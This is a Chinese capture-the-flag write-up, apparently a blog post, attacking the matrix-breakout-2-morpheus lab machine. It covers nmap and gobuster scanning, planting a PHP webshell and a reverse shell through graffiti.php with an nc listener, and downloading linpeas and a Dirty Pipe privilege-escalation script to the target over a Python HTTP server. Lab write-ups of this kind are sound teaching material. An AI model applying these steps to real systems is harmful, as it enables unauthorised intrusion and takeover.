matrix-breakout-2-morpheus靶场练习

kali:192.168.116.129

信息搜集:

nmap扫描:

nmap -sP 192.168.116.0/24

靶机IP: 192.168.116.133

nmap -sS -sV -A -T4 192.168.116.133

参数说明:

-p- 扫描所有65535端口

-sV 查看版本

-sS tcp半开放扫描

-A 综合扫描,包括系统探测,版本探测,脚本探测

-T 设置扫描时间

端口扫描:

nmap -p- 192.168.116.133

访问http80端口:

目录扫描:

gobuster dir -u http://192.168.116.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

-w:指字典

-x:找出 隐藏的后缀为php,html,txt的

gobuster:用在Web应用程序中进行目录和文件爆破的开源工具

安装gobuster: 打开kali终端 安装命令:

sudo apt update    
sudo apt install gobuster

发现rebots.txt目录 我们访问: 继续找

访问graffiti.php:

发现一个输入框  graffiti.txt这个是我们输入进去的文本内容

getshell方法1:

这里我们随便输入内容->抓包->修改内容为一句话木马:

访问1.php

蚁剑连接:

getshell方法2:

使用命令将我们需要的反弹shell工具复制到此处

cp /usr/share/webshells/php/php-reverse-shell.php .

打开php-reverse-shell.php 进行编辑 改kali的IP->保存

会把权限反弹到这个ip的1234端口 复制全部代码到BP

kali监听1234端口:

nc -lvp 1234

代码插入到这里:

访问5.php:

成功反弹shell:

利用python将伪终端->真终端

python3 -c 'import pty; pty.spawn("/bin/bash")'

权限提升:

我们尝试内核提权:

上传linpeas脚本进行枚举: 可以发现系统详细信息,包括可用的exp

在本地开启一个http服务:

python -m http.server 8081

靶机:  进入临时文件夹 下载我们需要的脚本

cd /tmp

下载成功:

运行这个脚本文件: 无法运行 先基于权限

chmod +x linpeas.sh
./linpeas.sh

我们可以利用这个:

漏洞详细: https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh

复制代码-> 创建一个1.sh->通过http服务->下载到靶机

开启服务:

python -m http.server 8081

下载到靶机:

修改权限并运行:

成功提权!

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值